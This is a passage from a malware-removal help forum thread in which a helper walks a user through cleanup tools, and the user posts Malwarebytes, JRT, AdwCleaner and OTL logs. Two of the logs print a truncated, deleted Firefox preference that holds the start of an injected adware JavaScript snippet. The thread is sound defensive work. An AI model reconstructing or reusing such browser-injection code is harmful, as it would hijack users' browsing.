2014-01-30 10:12:47 1111040 ----a-w- C:\Windows\System32\wer.dll
2014-01-30 07:46:58 876032 ----a-w- C:\Windows\SysWow64\wer.dll
.
============= FINISH: 19:44:08.51 ===============
 

 

Link to post
Share on other sites
Maniac

Maniac

Posted
Posted

Please run a Quick Scan with Malwarebytes and post the log:

Open up Malwarebytes => Settings Tab => Scanner Settings => Under action for PUP > Select: Show in Results List and Check for removal.

Please Update and run a Quick Scan with Malwarebytes Anti-Malware, post the report.

Make sure that everything is checked, and click Remove Selected.

Link to post
Share on other sites
alancarrr1

alancarrr1

Posted
  • Author
Posted

Hi Maniac,

 

Here's the log, it said nothing was found. Although it is definitely there.

 

Malwarebytes Anti-Malware (PRO) 1.75.0.1300
www.malwarebytes.org
 
Database version: v2014.03.25.04
 
Windows Vista Service Pack 2 x64 NTFS
Internet Explorer 9.0.8112.16421
Alan :: ALAN-PC [administrator]
 
Protection: Enabled
 
25/03/2014 15:23:29
mbam-log-2014-03-25 (15-23-29).txt
 
Scan type: Quick scan
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 225516
Time elapsed: 12 minute(s), 6 second(s)
 
Memory Processes Detected: 0
(No malicious items detected)
 
Memory Modules Detected: 0
(No malicious items detected)
 
Registry Keys Detected: 0
(No malicious items detected)
 
Registry Values Detected: 0
(No malicious items detected)
 
Registry Data Items Detected: 0
(No malicious items detected)
 
Folders Detected: 0
(No malicious items detected)
 
Files Detected: 0
(No malicious items detected)
 
(end)
Link to post
Share on other sites
Maniac

Maniac

Posted
Posted

Step 1

Please download Junkware Removal Tool to your desktop.

  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista or Seven, right-mouse click it and select Run as Administrator.
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
Step 2

Please download AdwCleaner by Xplode onto your desktop.

  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click on Scan button. Wait until is finished.
  • Click on Clean.
  • Confirm each time with Ok.
  • Your computer will be rebooted automatically. A text file will open after the restart.
  • Please post the content of that logfile with your next answer.
  • You can find the logfile at C:\AdwCleaner\AdwCleaner[s0].txt as well.
In your next reply, post the following log files:
  • Junkware Removal Tool log
  • AdwCleaner log
Link to post
Share on other sites
alancarrr1

alancarrr1

Posted
  • Author
Posted

Hi, thanks for your help, here are the logs:

 

 

Junkware Removal Tool

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.1.3 (03.23.2014:1)
OS: Windows Vista Home Premium x64
Ran by Alan on 25/03/2014 at 17:05:24.54
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
~~~ Services
 
 
 
~~~ Registry Values
 
 
 
~~~ Registry Keys
 
 
 
~~~ Files
 
 
 
~~~ Folders
 
 
 
~~~ FireFox
 
Successfully deleted the following from C:\Users\Alan\AppData\Roaming\mozilla\firefox\profiles\5lqwfxjt.default\prefs.js
 
user_pref("extensions.yUB.scode", "(function(){try{var url=window.self.location.href;if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"su
 
 
 
~~~ Event Viewer Logs were cleared
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 25/03/2014 at 17:16:01.09
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 

 

 

ADW Cleaner

 

# AdwCleaner v3.022 - Report created 25/03/2014 at 17:42:15
# Updated 13/03/2014 by Xplode
# Operating System : Windows Vista Home Premium Service Pack 2 (64 bits)
# Username : Alan - ALAN-PC
# Running from : C:\Users\Alan\Downloads\AdwCleaner (1).exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v9.0.8112.16540
 
 
-\\ Mozilla Firefox v27.0.1 (en-US)
 
[ File : C:\Users\Alan\AppData\Roaming\Mozilla\Firefox\Profiles\5lqwfxjt.default\prefs.js ]
 
Line Deleted : user_pref("extensions.yUB.scode", "(function(){try{var url=window.self.location.href;if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf[...]
 
-\\ Google Chrome v32.0.1700.107
 
[ File : C:\Users\Alan\AppData\Local\Google\Chrome\User Data\Default\preferences ]
 
 
*************************
 
AdwCleaner[R0].txt - [18089 octets] - [21/03/2014 01:18:45]
AdwCleaner[R1].txt - [1025 octets] - [21/03/2014 02:26:58]
AdwCleaner[R2].txt - [1371 octets] - [25/03/2014 17:19:27]
AdwCleaner[s0].txt - [14280 octets] - [21/03/2014 01:23:55]
AdwCleaner[s1].txt - [1087 octets] - [21/03/2014 02:34:09]
AdwCleaner[s2].txt - [1294 octets] - [25/03/2014 17:42:15]
 
########## EOF - C:\AdwCleaner\AdwCleaner[s2].txt - [1354 octets] ##########

 

Link to post
Share on other sites
Maniac

Maniac

Posted
Posted

Download OTL to your Desktop

  • Double click on the icon to run it. Make sure all other windows are closed and to let it run uninterrupted.
  • Please tick the Scan All users. Next, click the Quick Scan button. The scan wont take long.
    • When the scan completes, it will open two notepad windows. OTL.Txt and Extras.Txt. These are saved in the same location as OTL.
    • Please copy (Edit->Select All, Edit->Copy) the contents of these files, one at a time and post them in your topic.
Link to post
Share on other sites
alancarrr1

alancarrr1

Posted
  • Author
Posted

Ok here is the OTL.txt

 

OTL logfile created on: 28/03/2014 16:07:42 - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Alan\Desktop
64bit-Windows Vista Home Premium Edition Service Pack 2 (Version = 6.0.6002) - Type = NTWorkstation
Internet Explorer (Version = 9.0.8112.16421)
Locale: 00000809 | Country: United Kingdom | Language: ENG | Date Format: dd/MM/yyyy
 
3.87 Gb Total Physical Memory | 2.41 Gb Available Physical Memory | 62.28% Memory free
7.95 Gb Paging File | 5.62 Gb Available in Paging File | 70.63% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 451.62 Gb Total Space | 247.92 Gb Free Space | 54.90% Space Free | Partition Type: NTFS
Drive D: | 14.14 Gb Total Space | 1.92 Gb Free Space | 13.55% Space Free | Partition Type: NTFS
 
Computer Name: ALAN-PC | User Name: Alan | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - File not found -- 
PRC - [2014/03/28 16:05:31 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Alan\Desktop\OTL.exe
PRC - [2013/04/04 14:50:32 | 000,701,512 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
PRC - [2013/04/04 14:50:32 | 000,532,040 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
PRC - [2013/04/04 14:50:32 | 000,418,376 | ---- | M] (Malwarebytes Corporation) -- C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
PRC - [2007/04/18 15:01:34 | 000,065,536 | ---- | M] (Hewlett-Packard Company) -- C:\hp\support\hpsysdrv.exe
PRC - [2006/05/26 03:50:24 | 004,149,248 | ---- | M] () -- C:\Program Files (x86)\MySQL\MySQL Server 5.0\bin\mysqld-nt.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2014/02/13 04:04:54 | 000,998,400 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management\c5213af29d521ee19cc55983f8c2037c\System.Management.ni.dll
MOD - [2014/02/13 04:03:05 | 000,771,584 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\e3ab5ab0fbb86c36425e6902e54a547b\System.Runtime.Remoting.ni.dll
MOD - [2014/02/13 04:03:02 | 000,627,200 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Transactions\24c666e940e61baf4d33315346a03ab6\System.Transactions.ni.dll
MOD - [2014/02/13 04:03:01 | 000,627,712 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.EnterpriseSe#\cbadc7af4484ceeb8092c5f2b1240f0b\System.EnterpriseServices.ni.dll
MOD - [2014/02/13 04:03:01 | 000,280,064 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.EnterpriseSe#\cbadc7af4484ceeb8092c5f2b1240f0b\System.EnterpriseServices.Wrapper.dll
MOD - [2014/02/13 04:02:53 | 000,978,944 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\d17ceca243fabda73eefb21d9bd072df\System.Configuration.ni.dll
MOD - [2014/02/13 03:49:56 | 005,462,016 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\f87e71868aedbc6c4e8fe7160d17c4ab\System.Xml.ni.dll
MOD - [2014/02/13 03:49:40 | 012,434,432 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\d2b605fc7deda872727d1ed37710420e\System.Windows.Forms.ni.dll
MOD - [2014/02/13 03:49:31 | 001,593,344 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\8e6265a54260bddfc05951e764f5bc48\System.Drawing.ni.dll
MOD - [2014/02/13 03:49:17 | 006,622,208 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Data\6252b82373099322bef5f577bab408b6\System.Data.ni.dll
MOD - [2014/02/13 03:49:06 | 000,368,128 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\PresentationFramewo#\71e362b114f878201540696b6d66bf45\PresentationFramework.Aero.ni.dll
MOD - [2014/02/13 03:49:05 | 014,329,856 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\PresentationFramewo#\b46f1c203d1e4bec4597adf684ec1d41\PresentationFramework.ni.dll
MOD - [2014/02/13 03:48:46 | 012,218,880 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\PresentationCore\07d57714fff9db216537473f4a777f22\PresentationCore.ni.dll
MOD - [2014/02/13 03:48:32 | 003,325,440 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\WindowsBase\d981bccab40fbbdc1d35bf2a58c947b7\WindowsBase.ni.dll
MOD - [2014/02/13 03:48:28 | 007,977,984 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\System\957628d9dd7b3bf370a56dca7835a997\System.ni.dll
MOD - [2014/02/13 03:48:21 | 011,497,984 | ---- | M] () -- C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\694a37a84dee2cd2609a1dfab27c0433\mscorlib.ni.dll
MOD - [2013/01/28 13:08:56 | 000,087,952 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2013/01/28 13:08:28 | 001,242,512 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2009/04/11 06:28:21 | 000,368,640 | ---- | M] () -- C:\WINDOWS\SysWOW64\msjetoledb40.dll
MOD - [2009/04/11 02:04:15 | 000,113,664 | ---- | M] () -- C:\Windows\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll
MOD - [2009/03/30 04:42:19 | 000,261,632 | ---- | M] () -- C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
MOD - [2009/03/30 04:42:17 | 002,933,760 | ---- | M] () -- C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
MOD - [2008/07/03 11:45:00 | 000,032,768 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Content.XmlSerializers.dll
MOD - [2008/07/03 11:42:56 | 000,007,168 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\RemotingClient.dll
MOD - [2008/07/03 11:42:54 | 000,057,344 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Pillars\PCAlerts\PCAlertsPillar.dll
MOD - [2008/07/03 11:42:48 | 000,114,688 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\ECLibrary.dll
MOD - [2008/07/03 11:42:46 | 000,010,240 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingClients.dll
MOD - [2008/07/03 11:42:40 | 000,040,960 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingServer.dll
MOD - [2008/07/03 11:42:40 | 000,028,672 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingMessages.dll
MOD - [2008/07/03 11:42:40 | 000,005,632 | ---- | M] () -- C:\Program Files (x86)\Hewlett-Packard\HP Advisor\MessagingInterface.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2012/10/21 09:36:16 | 000,121,856 | ---- | M] (ActMask Co.,Ltd - http://www.all2pdf.com)
O4:64bit: - HKLM..\Run: [Windows Defender] C:\Program Files\Windows Defender\MSASCui.exe (Microsoft Corporation)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [HP Health Check Scheduler] c:\Program Files (x86)\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe (Hewlett-Packard)
O4 - HKLM..\Run: [hpsysdrv] c:\hp\support\hpsysdrv.exe (Hewlett-Packard Company)
O4 - HKLM..\Run: [KBD] C:\hp\KBD\KbdStub.exe ()
O4 - HKLM..\Run: [LifeCam] C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe (Microsoft Corporation)
O4 - HKLM..\Run: [OsdMaestro] c:\Program Files\Hewlett-Packard\On-Screen OSD Indicator\OSD64.exe (OsdMaestro)
O4 - HKU\S-1-5-21-465606687-3642172284-1488456202-1000..\Run: [GoogleDriveSync] "C:\Program Files (x86)\Google\Drive\googledrivesync.exe" /autostart File not found
O4 - HKLM..\RunOnce: [AvgUninstallURL] C:\Windows\SysWow64\cmd.exe (Microsoft Corporation)
O4 - HKU\.DEFAULT..\RunOnce: [spUninstallDeleteDir] rmdir /s /q "\SearchProtect" File not found
O4 - HKU\S-1-5-18..\RunOnce: [spUninstallDeleteDir] rmdir /s /q "\SearchProtect" File not found
O4 - Startup: C:\Users\Alan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe Gamma.lnk = C:\Program Files (x86)\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe (Adobe Systems, Inc.)
O4 - Startup: C:\Users\Alan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Tracker.lnk = C:\Program Files (x86)\Tracker\Tracker.exe ()
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O1364bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O15 - HKU\.DEFAULT\..Trusted Ranges: Range1 ([http] in Local intranet)
O15 - HKU\S-1-5-18\..Trusted Ranges: Range1 ([http] in Local intranet)
O15 - HKU\S-1-5-21-465606687-3642172284-1488456202-1000\..Trusted Ranges: Range1 ([http] in Local intranet)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.7.0/jinstall-1_7_0_17-windows-i586.cab (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0017-0000-0017-ABCDEFFEDCBA} http://java.sun.com/update/1.7.0/jinstall-1_7_0_17-windows-i586.cab (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.7.0/jinstall-1_7_0_17-windows-i586.cab (Reg Error: Key error.)
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.1.254
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{20DD8DB8-06EA-4D40-A3CC-B974B24382EB}: DhcpNameServer = 192.168.1.254
O18:64bit: - Protocol\Handler\grooveLocalGWS - No CLSID value found
O18:64bit: - Protocol\Handler\ms-help - No CLSID value found
O18:64bit: - Protocol\Handler\ms-itss - No CLSID value found
O18:64bit: - Protocol\Handler\skype4com - No CLSID value found
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O20:64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\WINDOWS\SysWOW64\userinit.exe (Microsoft Corporation)
O24 - Desktop WallPaper: C:\WINDOWS\Web\Wallpaper\awave.jpg
O24 - Desktop BackupWallPaper: C:\WINDOWS\Web\Wallpaper\awave.jpg
O32 - HKLM CDRom: AutoRun - 1
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/03/28 16:06:07 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Alan\Desktop\OTL.exe
[2014/03/28 14:59:50 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\test
[2014/03/28 13:52:14 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Futura Font
[2014/03/27 21:21:09 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Stripe-Larry-Ullman
[2014/03/27 14:10:24 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\WP Page Speed
[2014/03/26 17:54:33 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\futura
[2014/03/26 16:44:50 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\wppagespeed
[2014/03/26 13:00:55 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Alannah Optimized
[2014/03/25 17:04:26 | 001,038,974 | ---- | C] (Thisisu) -- C:\Users\Alan\Desktop\JRT (1).exe
[2014/03/25 17:00:52 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\171281
[2014/03/25 15:32:16 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\wp-whos-online
[2014/03/25 15:31:46 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\p2-likes
[2014/03/25 15:31:30 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\p2-by-email
[2014/03/24 19:00:03 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\PSDs
[2014/03/24 14:28:33 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Tax Zone Plus
[2014/03/23 21:08:31 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Sumil
[2014/03/23 20:09:56 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Epray V2
[2014/03/21 03:03:22 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes' Anti-Malware (portable)
[2014/03/21 02:51:51 | 000,091,352 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2014/03/21 01:55:38 | 000,000,000 | -HSD | C] -- C:\$RECYCLE.BIN
[2014/03/21 01:52:24 | 000,518,144 | ---- | C] (SteelWerX) -- C:\Windows\SWREG.exe
[2014/03/21 01:52:24 | 000,406,528 | ---- | C] (SteelWerX) -- C:\Windows\SWSC.exe
[2014/03/21 01:52:24 | 000,060,416 | ---- | C] (NirSoft) -- C:\Windows\NIRCMD.exe
[2014/03/21 01:52:19 | 000,000,000 | --SD | C] -- C:\ComboFix
[2014/03/21 01:51:38 | 000,000,000 | --SD | C] -- C:\32788R22FWJFW
[2014/03/21 01:49:11 | 000,000,000 | ---D | C] -- C:\Qoobox
[2014/03/21 01:48:40 | 000,000,000 | ---D | C] -- C:\Windows\erdnt
[2014/03/21 01:32:49 | 000,000,000 | ---D | C] -- C:\Windows\ERUNT
[2014/03/21 01:20:44 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\VIRUS REMOVAL
[2014/03/21 01:18:41 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2014/03/21 00:32:16 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\VS Revo Group
[2014/03/21 00:32:16 | 000,000,000 | ---D | C] -- C:\Users\Alan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
[2014/03/18 21:20:48 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Najlepsze Lokaty
[2014/03/17 00:13:07 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Free Bitcoins Online
[2014/03/15 22:10:19 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Master Resale
[2014/03/15 20:07:48 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Audacity
[2014/03/14 17:38:44 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
[2014/03/14 17:38:44 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Skype
[2014/03/14 17:38:40 | 000,000,000 | R--D | C] -- C:\Program Files (x86)\Skype
[2014/03/13 20:56:36 | 000,000,000 | ---D | C] -- C:\ProgramData\Oracle
[2014/03/13 20:54:24 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
[2014/03/06 12:51:58 | 000,000,000 | ---D | C] -- C:\Users\Alan\Desktop\Undercover Tipster
[2014/03/05 14:59:04 | 000,000,000 | ---D | C] -- C:\Users\Alan\AppData\Local\Skype
[3 C:\Windows\SysWow64\*.tmp files -> C:\Windows\SysWow64\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2014/03/28 16:05:31 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Alan\Desktop\OTL.exe
[2014/03/28 15:46:00 | 000,000,894 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/03/28 15:44:04 | 000,003,616 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
[2014/03/28 15:44:04 | 000,003,616 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
[2014/03/28 15:18:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/03/28 14:55:18 | 000,003,933 | ---- | M] () -- C:\Users\Alan\Desktop\terms-in-comments.php
[2014/03/28 14:01:34 | 000,365,691 | ---- | M] () -- C:\Users\Alan\Desktop\Screen Shot 2014-03-28 at 9.49.56 AM.png
[2014/03/28 13:52:37 | 000,216,089 | ---- | M] () -- C:\Users\Alan\Desktop\Futura Font.zip
[2014/03/28 13:15:35 | 000,533,740 | ---- | M] () -- C:\Users\Alan\Desktop\Screen Shot 2014-03-28 at 9.14.22 AM.png
[2014/03/28 07:46:00 | 000,000,890 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/03/27 23:29:56 | 000,000,600 | ---- | M] () -- C:\Users\Alan\AppData\Local\PUTTY.RND
[2014/03/27 23:29:08 | 000,002,804 | ---- | M] () -- C:\Users\Alan\Desktop\bg.jpg
[2014/03/27 23:23:44 | 000,025,539 | ---- | M] () -- C:\Users\Alan\Desktop\bg.png
[2014/03/27 21:18:45 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-checkout.php
[2014/03/27 19:58:58 | 000,007,276 | ---- | M] () -- C:\Users\Alan\Desktop\images.jpg
[2014/03/27 18:51:14 | 000,000,416 | ---- | M] () -- C:\Users\Alan\Desktop\close.png
[2014/03/27 18:51:08 | 000,000,715 | ---- | M] () -- C:\Users\Alan\Desktop\open.png
[2014/03/27 17:08:02 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\sidebar.php
[2014/03/27 16:21:29 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-speed-service.php
[2014/03/27 16:21:18 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-faq.php
[2014/03/27 16:21:10 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-custom-enquiry.php
[2014/03/27 16:20:54 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-contact.php
[2014/03/26 21:29:57 | 000,023,552 | ---- | M] () -- C:\Users\Alan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2014/03/26 21:29:54 | 001,713,132 | ---- | M] () -- C:\Users\Alan\Desktop\salesvideo.wmv
[2014/03/26 21:10:11 | 000,012,208 | ---- | M] () -- C:\Users\Alan\Desktop\google-page-speed.png
[2014/03/26 21:08:46 | 000,232,310 | ---- | M] () -- C:\Users\Alan\Desktop\new-google-logo-knockoff.png
[2014/03/26 21:07:22 | 000,004,881 | ---- | M] () -- C:\Users\Alan\Desktop\google-pagespeed-logo.png
[2014/03/26 21:03:10 | 000,005,210 | ---- | M] () -- C:\Users\Alan\Desktop\gtmetrix.png
[2014/03/26 19:44:25 | 000,008,033 | ---- | M] () -- C:\Users\Alan\Desktop\progress.gif
[2014/03/26 18:12:25 | 004,535,820 | ---- | M] () -- C:\Users\Alan\Desktop\TAXZONE PLUS Features Walk Through.pdf
[2014/03/26 15:35:03 | 000,000,260 | ---- | M] () -- C:\Users\Alan\Desktop\.htaccess
[2014/03/26 15:08:33 | 000,010,609 | ---- | M] () -- C:\Users\Alan\Desktop\scope_square-940x940.jpg
[2014/03/26 15:08:24 | 000,013,706 | ---- | M] () -- C:\Users\Alan\Desktop\2013-10-31-12.40.23-940x702.jpg
[2014/03/26 15:08:14 | 000,009,617 | ---- | M] () -- C:\Users\Alan\Desktop\photo26.jpg
[2014/03/26 15:08:05 | 000,015,124 | ---- | M] () -- C:\Users\Alan\Desktop\keyboard.jpg
[2014/03/26 15:07:55 | 000,011,675 | ---- | M] () -- C:\Users\Alan\Desktop\wordpress-logo-square.png
[2014/03/26 15:05:18 | 000,325,635 | ---- | M] () -- C:\Users\Alan\Desktop\2012-04-05-11.46.04.jpg
[2014/03/26 14:15:14 | 000,021,787 | ---- | M] () -- C:\Users\Alan\Desktop\screen.jpg
[2014/03/26 12:36:12 | 000,061,571 | ---- | M] () -- C:\Users\Alan\Desktop\RobInvoice.jpg
[2014/03/26 12:19:18 | 000,546,475 | ---- | M] () -- C:\Users\Alan\Desktop\hometopbg.jpg
[2014/03/26 12:15:30 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-prayer-wall.php
[2014/03/25 17:43:44 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/03/25 17:04:23 | 001,038,974 | ---- | M] (Thisisu) -- C:\Users\Alan\Desktop\JRT (1).exe
[2014/03/25 17:01:22 | 001,179,320 | ---- | M] () -- C:\Users\Alan\Desktop\171281.zip
[2014/03/25 17:01:01 | 001,157,816 | ---- | M] () -- C:\Users\Alan\Desktop\171281.rar
[2014/03/25 16:25:37 | 000,053,594 | ---- | M] () -- C:\Users\Alan\Desktop\six.jpg
[2014/03/25 15:17:42 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\squeeze-page-3.php
[2014/03/25 11:45:18 | 000,136,974 | ---- | M] () -- C:\Users\Alan\Desktop\style.css
[2014/03/25 11:39:37 | 000,019,846 | ---- | M] () -- C:\Users\Alan\Desktop\footerbg.png
[2014/03/25 11:22:27 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\page-home.php
[2014/03/25 11:20:34 | 000,000,000 | ---- | M] () -- C:\Users\Alan\Desktop\new.css
